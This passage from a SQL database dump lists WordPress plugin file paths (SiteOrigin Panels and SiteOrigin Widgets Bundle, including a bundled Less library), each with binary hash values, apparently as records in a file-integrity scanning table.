','',0,'?'),('1%ƱYF','wp-content/plugins/siteorigin-panels/widgets/widgets/testimonial/styles/simple.less',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ҸW}sF','5鞻Լ{`K\\cf]','',0,'?'),('(GѶcYu5s','wp-content/plugins/siteorigin-panels/widgets/widgets/testimonial/testimonial.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','72Evc','C6M]aX.!qUh\"}^b<\'','',0,'?'),('3A8#','wp-content/plugins/siteorigin-panels/widgets/widgets/testimonial/tpl/simple.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h$oG[','fZ{Q6O5?Jd}TyɯgA(','',0,'?'),(':G%U\\7jT','wp-content/plugins/siteorigin-panels/widgets/widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' P_tEZ','w=,ѧe% \nD2M/','',0,'?'),('9mk~vf','wp-content/plugins/so-widgets-bundle/admin/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','MmB;߿0#','X#g\\tܵTt*3T','',0,'?'),('itՌg!B','wp-content/plugins/so-widgets-bundle/admin/admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nWsUkU2','q)?ֵW=10rHh^5.','',0,'?'),('>͎','wp-content/plugins/so-widgets-bundle/admin/admin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(:','oτݶ=8JJlw\Z\n}z/','',0,'?'),('InŁ','wp-content/plugins/so-widgets-bundle/admin/images/icon-back.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','sA<\'/?<-','7!``  V_\":P|s[','',0,'?'),('?<@HR5','wp-content/plugins/so-widgets-bundle/admin/images/icon-front.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D\nԼנw䆾@','Hx*JK^MǍkU8Z_\Z\'Ő/8','',0,'?'),('5YytG~Xl','wp-content/plugins/so-widgets-bundle/admin/images/icon-gear.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H$EsC8','g0~~(ј$o 	дw\Z','',0,'?'),('/|b0T߅','wp-content/plugins/so-widgets-bundle/admin/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ӆ{C','T-C1lȝ>dDIiCk','',0,'?'),('p1\n.1X!vs','wp-content/plugins/so-widgets-bundle/admin/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=pT\\v0	v','_!#yqNp|\rWy%Ͳ[','',0,'?'),('S\0\Z:r8ow|','wp-content/plugins/so-widgets-bundle/admin/tpl/admin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w~\'ϛ8z)T[','}wt	 d\\L>`ic&','',0,'?'),('s\'gGR?r~','wp-content/plugins/so-widgets-bundle/admin/trianglify.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';<@A,|Wޠ5/','ӸT(d\n|:;o!_0','',0,'?'),('CMˏ','wp-content/plugins/so-widgets-bundle/admin/trianglify.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eF v&:\Z','~fQA\"wV\\)i3','',0,'?'),('Q	DStK','wp-content/plugins/so-widgets-bundle/base/base.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\ZvWFVy{2','qWBC(LbP-TjB/)m','',0,'?'),('(2]}o0 &','wp-content/plugins/so-widgets-bundle/base/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XC+,\"-','x*Dbs3]XJW4b1`','',0,'?'),('1݋7e܅','wp-content/plugins/so-widgets-bundle/base/css/img/arrow-down.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','._Iw!\"]D0','gߜv3J\'Ux!+R(Y[7','',0,'?'),('+tDHJY偊	','wp-content/plugins/so-widgets-bundle/base/css/img/arrow-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r2$xm','L?@5%(*]镪.zlj','',0,'?'),('L@@]:','wp-content/plugins/so-widgets-bundle/base/css/img/bundle-icon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˮ\"C','r y~\Z#@|?ATһ,#E','',0,'?'),(' NS.Uז','wp-content/plugins/so-widgets-bundle/base/css/img/close-white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\0N-7#̲\"xy,','}-t0C_}1>\ns','',0,'?'),('z^zXg0@','wp-content/plugins/so-widgets-bundle/base/css/img/close.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5yIvC޼>r',']>Khk/dKxF1lO<:O','',0,'?'),('D:=Zj0','wp-content/plugins/so-widgets-bundle/base/css/img/loading.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Gi91<av|','r#j4>e$AR6>','',0,'?'),('UPi0cE','wp-content/plugins/so-widgets-bundle/base/css/img/menu-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R3*iE','_cw\"lj\r}z{Rw','',0,'?'),('K\'\'\Zݟ','wp-content/plugins/so-widgets-bundle/base/css/img/order-asc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+&\0\0H\\F','W§\na\0ݬJuܒ7YIIk','',0,'?'),('>ltJJ)','wp-content/plugins/so-widgets-bundle/base/css/img/order-desc.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1DEH	&','\0i_p*쎕ہ~f\'usjO','',0,'?'),('<_BGuWt|','wp-content/plugins/so-widgets-bundle/base/css/img/ordering-icons.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>}Ja4R','jB=݉Zq/똵߶2sd9a','',0,'?'),('*ԉ\nQ_','wp-content/plugins/so-widgets-bundle/base/css/img/thumbnail-placeholder.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|Ը[FC0','zTdEDFQVݞr]X<','',0,'?'),('QENE\"95+>','wp-content/plugins/so-widgets-bundle/base/css/img/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ӆ{C','T-C1lȝ>dDIiCk','',0,'?'),('P7.<B\\UtUn','wp-content/plugins/so-widgets-bundle/base/css/img/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%j->\ZQ','\r\r]%\Z[d#6`]:FZ','',0,'?'),('#Wg%`>K3\0#','wp-content/plugins/so-widgets-bundle/base/css/preview.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';.4T}l','l	*0x ȔAɪ\'@3:_̝','',0,'?'),('Ի;̪ǈl\n','wp-content/plugins/so-widgets-bundle/base/inc/Parsedown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l:bX|u7f%','ydH>AMGBV¯yZcQ','',0,'?'),('D#C','wp-content/plugins/so-widgets-bundle/base/inc/actions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<VjbCfk','bP[q5xfrR}8>6G','',0,'?'),('h^ʍCH','wp-content/plugins/so-widgets-bundle/base/inc/array-utils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d9tӦ','kܶj$|=9zF)IH','',0,'?'),('BjkS:\\Y;','wp-content/plugins/so-widgets-bundle/base/inc/attachments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d*.\0Eٻ','k%A\\z+#wpZ}5F.yv/','',0,'?'),('blI.1Ƥh;','wp-content/plugins/so-widgets-bundle/base/inc/color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o4\ZH3','8-s(,4]7z0Df^ٯ','',0,'?'),('vЬy)|!','wp-content/plugins/so-widgets-bundle/base/inc/fields/autocomplete.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','UyJb6$2','`xL]6\r=a.1]tH#I','',0,'?'),('sSR3Wp\01T','wp-content/plugins/so-widgets-bundle/base/inc/fields/base.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','cRryϼ;','$OxGr#ZNaEz','',0,'?'),('w4d\0~x','wp-content/plugins/so-widgets-bundle/base/inc/fields/builder.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʪ2.7	]','$iymg+5D  -|g*s','',0,'?'),('cHMpjonr=','wp-content/plugins/so-widgets-bundle/base/inc/fields/checkbox.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Tx-*A','EǽG)7w]Qeb)\"\0Tڼ','',0,'?'),('b7z×h{','wp-content/plugins/so-widgets-bundle/base/inc/fields/checkboxes.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3Bq~|G','o@]ҋvr9yJ\0v?e','',0,'?'),('@ԍ(EkAt','wp-content/plugins/so-widgets-bundle/base/inc/fields/code.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','])\rM~C','cfK\Z9\n\"\'ly_P	[','',0,'?'),('>=qn9Ϣ','wp-content/plugins/so-widgets-bundle/base/inc/fields/color.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\,,kZ','й7shn=KՇ,jΡ;⁈[(','',0,'?'),('V2:t\"#HZ_{','wp-content/plugins/so-widgets-bundle/base/inc/fields/container-base.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f@2.V2','V0H#BQ͓\'e','',0,'?'),('1\"-y|','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/date-range-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$e٨ϧr[','i\\8>:]ڛoQA$x*& Pe4','',0,'?'),('v^Fb⩡<','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/icon-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h9X²R','JW)@N߂?g䗴&','',0,'?'),('eZ\"\\Q<[:','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/image-radio-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\\3Ű','P<lGV','',0,'?'),('!Bm:!ܮZ','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/images/wpspin_light-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}ӆ{C','T-C1lȝ>dDIiCk','',0,'?'),('l)޸,5','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/images/wpspin_light.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=pT\\v0	v','_!#yqNp|\rWy%Ͳ[','',0,'?'),('p.¢JZU.<%','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/measurement-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rkYW\ZkB2H	O','TISM\rG{\Z$eB','',0,'?'),('r`.ĩ;','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/media-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','׻˩}zճ<','|Y,26yt(fp_.\r/X;','',0,'?'),('0>$3w`0 >sGf','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/multi-measurement-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d+,9Ɯ,شh','\08!`P<{sUm','',0,'?'),(',Pr0VY','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/order-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','jyrZ:ٝ',',̏kk/~#2PN`0','',0,'?'),('cR@ޒ','wp-content/plugins/so-widgets-bundle/base/inc/fields/css/tinymce-field.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gbc\0','@|Gb\0\0w͠Iz%X','',0,'?'),('WXy!q','wp-content/plugins/so-widgets-bundle/base/inc/fields/date-range.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<ƅj&6','GI߳JAG|Re_ ','',0,'?'),('DVFU\Ze9}T','wp-content/plugins/so-widgets-bundle/base/inc/fields/error.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~eltQ^','t\0UYbPS^CS~\nA','',0,'?'),('Azvl ','wp-content/plugins/so-widgets-bundle/base/inc/fields/factory.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R ȫ\0˷@','g6n/+bW*ږMDscm','',0,'?'),('TYƽ^sWo','wp-content/plugins/so-widgets-bundle/base/inc/fields/font.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Sb[x O','j#O]7Ϙ,$%2 \nm0','',0,'?'),('3S7U','wp-content/plugins/so-widgets-bundle/base/inc/fields/icon.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hX/h','5?tى7{-ݴI?~鵪Z','',0,'?'),('-9+e::Bd','wp-content/plugins/so-widgets-bundle/base/inc/fields/image-radio.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ܶ03I\Z<','(M2C[gp:$F>%]}\Z','',0,'?'),('#_#!@^k+}~','wp-content/plugins/so-widgets-bundle/base/inc/fields/image-size.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0\"9\n+Q?',',7X2ȯkC,3е?@1_,O\\','',0,'?'),('@\"lY-b','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/autocomplete-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=Fb3&','7<?ek4f{c^D}ج{9i','',0,'?'),('@x#ƴOd','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/autocomplete-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','/L2AV/g','2R 3	v]A%j66n\\','',0,'?'),('_2rp}','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/code-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4~v?\Z','\ZAXt-0<6\ZYi4TaFE0\Z','',0,'?'),('[]9|MnyS8','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/code-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fOyTRd67L~/>','1nWI6ߌ`]eQWXηd+','',0,'?'),('qFEp=7HH%6','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/date-range-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','kpl-HJX','ګ}my]H,еEdWvU','',0,'?'),('Vw4NV/f)N9','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/date-range-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zk(_A2N(','o~QY^`p4J\r\'$','',0,'?'),('=3Ƅ<5%','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/icon-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ΙA(/p','~[N̬iNd&]Q6s0qw<+r{','',0,'?'),('_^\"}WcN','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/icon-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ps1ea\r','Zy^0Mt1/J\\','',0,'?'),('`cg+)J($C','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/image-radio-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ct`p','{ ٠6/\n3\0HK(Bm','',0,'?'),('Ov=cɼvw','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/image-radio-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kw__	','WT@Ir-{ُX6O*$','',0,'?'),('zr+B-tLzE','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/media-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9h[o}>q	|','䧴cPs{%=>y:/,','',0,'?'),('Rs&/a0l','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/media-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','olk@','$Y-j{#RӅ+vZb\Zj','',0,'?'),('bzQM','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/multi-measurement-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}/lT}H,','T\Zk{10c\nbF','',0,'?'),('?J\\8.J','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/multi-measurement-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1B<\"ժ	y','`[y@J	2ܨ>Hsg~Ӥ9','',0,'?'),('$,3)Wz ','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/order-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K%jH','0{*Z6?HfVaYm[)`x%','',0,'?'),('tW4=J\'Š','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/order-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hvMn/d{f','aIZrR\"<]hV]stk|','',0,'?'),('?_0m᝼Nŗ','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/posts-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f,x҄ҹK$~','ISs]]^*/J#am(Y,\r>','',0,'?'),('t(f~=Q$','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/posts-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nÁedc','T5S^_%>t_3xiX?\'','',0,'?'),('Z,=q2X','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/presets-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϚX×=Ή+','zod4{$o3! ^vi','',0,'?'),('|\nAb\0NÅD','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/presets-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Kw}j9v:','h#\'EY]|\Zّۈy','',0,'?'),('2CcQSi','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field-pre48.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HجMs[','{r;	Z# \'(ςB;','',0,'?'),('	*%Y^ \'ȫ^8[','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field-pre48.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h\r\r~u=','~%UU@jQtg^ƺ\0xmD:-L\'^6','',0,'?'),('U(sbr\Z<','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>]He?.i0','uH9^tv\"2H<-H>RGb','',0,'?'),('YH=f8n','wp-content/plugins/so-widgets-bundle/base/inc/fields/js/tinymce-field.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<MS숾?1_\Ze','T\'\'im)<Ě\0Rkwa','',0,'?'),('~bO2OzH(?','wp-content/plugins/so-widgets-bundle/base/inc/fields/link.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','љL\\\r','MDݻPlR}{Ȓ?','',0,'?'),('YڎGsϲd7=','wp-content/plugins/so-widgets-bundle/base/inc/fields/measurement.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܅W/#O','\\Ӹm\\ _PZ7\0\n','',0,'?'),('zn}o.??*','wp-content/plugins/so-widgets-bundle/base/inc/fields/media.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(Pa\"?igktr','RQΧƎw@3SL˷QR','',0,'?'),('suN\niNt5R\n','wp-content/plugins/so-widgets-bundle/base/inc/fields/multi-measurement.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b:]\nw',';$v5_tO37\0G.\'gwDu','',0,'?'),('5}:]0!r','wp-content/plugins/so-widgets-bundle/base/inc/fields/number.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W_|F\\M',']6\\D+Hgs+!kJhF(]','',0,'?'),('z/5{SW^)P]','wp-content/plugins/so-widgets-bundle/base/inc/fields/order.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!glnvΓ','l~gD<`.h\n&','',0,'?'),('\r BCBO>H\'dw','wp-content/plugins/so-widgets-bundle/base/inc/fields/posts.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f\\a3x=]','-߱c{A\r7,0[!','',0,'?'),('ؗO\Z@{\ZÈ','wp-content/plugins/so-widgets-bundle/base/inc/fields/presets.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s-!b1!F#','9anon{ŧ (R,!','',0,'?'),('ykE<','wp-content/plugins/so-widgets-bundle/base/inc/fields/radio.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qt0)\Z4','.(w;;㪲+i71淶r7','',0,'?'),('JƪxyfrV','wp-content/plugins/so-widgets-bundle/base/inc/fields/repeater.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F=e','N~T$v\\Aw5@l_pp𵴶;$','',0,'?'),(',*5ŨS[h#','wp-content/plugins/so-widgets-bundle/base/inc/fields/section.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y3ۮԾ\0h','p`MLy$Almh%0sT','',0,'?'),('`|s.\n','wp-content/plugins/so-widgets-bundle/base/inc/fields/select.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a0S0IɎxp&V','39y_ZSӶi~wE\rU\0','',0,'?'),('w_K}{0OIJ','wp-content/plugins/so-widgets-bundle/base/inc/fields/siteorigin-widget-field-class-loader.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','z^$r','D\r.S)	LN	=0/2`t','',0,'?'),('_6,!65=','wp-content/plugins/so-widgets-bundle/base/inc/fields/slider.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Qכ\n3\rĀ','m\\p|I-<WB@Ր5','',0,'?'),('_A(4)f}Mp','wp-content/plugins/so-widgets-bundle/base/inc/fields/text-input-base.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`i<.n+Y','^\'\"zQIkX|th@  \'p','',0,'?'),('	7L݂@@','wp-content/plugins/so-widgets-bundle/base/inc/fields/text.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(LJ~$s','04&нsyފ	J5LrI','',0,'?'),('vS-d=\\','wp-content/plugins/so-widgets-bundle/base/inc/fields/textarea.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=znUݻ ','5<X}]ݻwqQUL9rU{','',0,'?'),('qYHnoy','wp-content/plugins/so-widgets-bundle/base/inc/fields/tinymce.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','caͬ#|','\"wO|I-Fi 8<','',0,'?'),('U2%y$1l4','wp-content/plugins/so-widgets-bundle/base/inc/fields/widget.class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?p_kRJ<','hpV\"%ѮDWxF2Qā','',0,'?'),('߇Wlo˱Zw8','wp-content/plugins/so-widgets-bundle/base/inc/fonts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0#QC6Yܒ','&:Vح=	E5v`E$','',0,'?'),('(yPDm||	71','wp-content/plugins/so-widgets-bundle/base/inc/less-functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d3G/F','&\r^@E`,X8XD`k\Z7','',0,'?'),('+)u\"$','wp-content/plugins/so-widgets-bundle/base/inc/lessc.inc.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','g%׏^pYg	','5JӤDKK3,)(:A\Z6o','',0,'?'),('(۩=Od?%','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Autoloader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uЄ;$',',	>QMޟaxΗ\'W`z','',0,'?'),(':MXBN,','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';s.Xy','0;)\"ng6b,_Fx|ċ','',0,'?'),('R(,s','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Colors.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X_|2<6[','̓/9(|tϝ3օA$¡','',0,'?'),('QCQTϑy','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Configurable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G\\S9ŎAcK#&','U7Rw=f,.\nʦjd','',0,'?'),('h3*?DEJ','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Environment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E9sj\n','ltFW%_zghǆk+nl9','',0,'?'),('N40J\nWzR','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Exception/Chunk.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';Q\"pϞ+','#Ly%̮Ht%_]5?\n','',0,'?'),('n*Nˤ.2','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Exception/Compiler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6B͍e._','e霹p\"be*:WX~','',0,'?'),('g~lf\\<\\','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Exception/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ѻD=^\0','48.k]	.c93;%','',0,'?'),('ͳG7S&R','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','}6=<Ng','-E*\\2Ş{mwqB','',0,'?'),('~[A8:P-','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Less.php.combine',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','qa#k}=','Їo`sz Vlv}ykNqM:','',0,'?'),('\"ѿ1L{;WM%','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Mime.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oWn','i?GJ5S1=zJۗřH','',0,'?'),('>\rn )nm','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Output/Mapped.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Mf5bM\0H','lD\0\ZW8fgKhP\Z b','',0,'?'),('LU}x.','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Output.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ԝ{*$7mg','&jlfLiYh_8=(Vz','',0,'?'),('mp[SMt+N','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Parser.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yX|Yn',')$/OiP>\r8/Tю_7','',0,'?'),('UdLi`','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/SourceMap/Base64VLQ.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H#MUE','<f\nٟՁ\',GQ^@f?Coei.3','',0,'?'),('.*lZ̳`','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/SourceMap/Generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','گe5F\0=Һ.','d4=`Z=ٽD×d!','',0,'?'),('I$\'^CVM\0/','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Alpha.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w8E-,7ȧ','liQvCP_]0K~A,RsDu','',0,'?'),('88خ:vQ1	','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Anonymous.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H>OA','/Jj.	>ζ\0F\']\"P6c','',0,'?'),('E-=q','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Assignment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rÙFAPP','@#|<ls+b`IxQOȏ','',0,'?'),('^/IƟzTPwg','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Attribute.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^YLr)','3PvΒH/ݯr:SÁZ','',0,'?'),('\rWbUa_','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Call.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vB*,','RTSuJL(c.\"','',0,'?'),('RЁq o!','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	n:g\n__⫣o','Ծ\0AK)[yF9;','',0,'?'),('ZIDks','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','N-|v?@',',lr4QV(sz=p\'շ','',0,'?'),('=!QV؋E!gu','wp-content/plugins/so-widgets-bundle/base/inc/lib/Less/Tree/Condition.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w[\0˦-c','TDvEid cwM1VE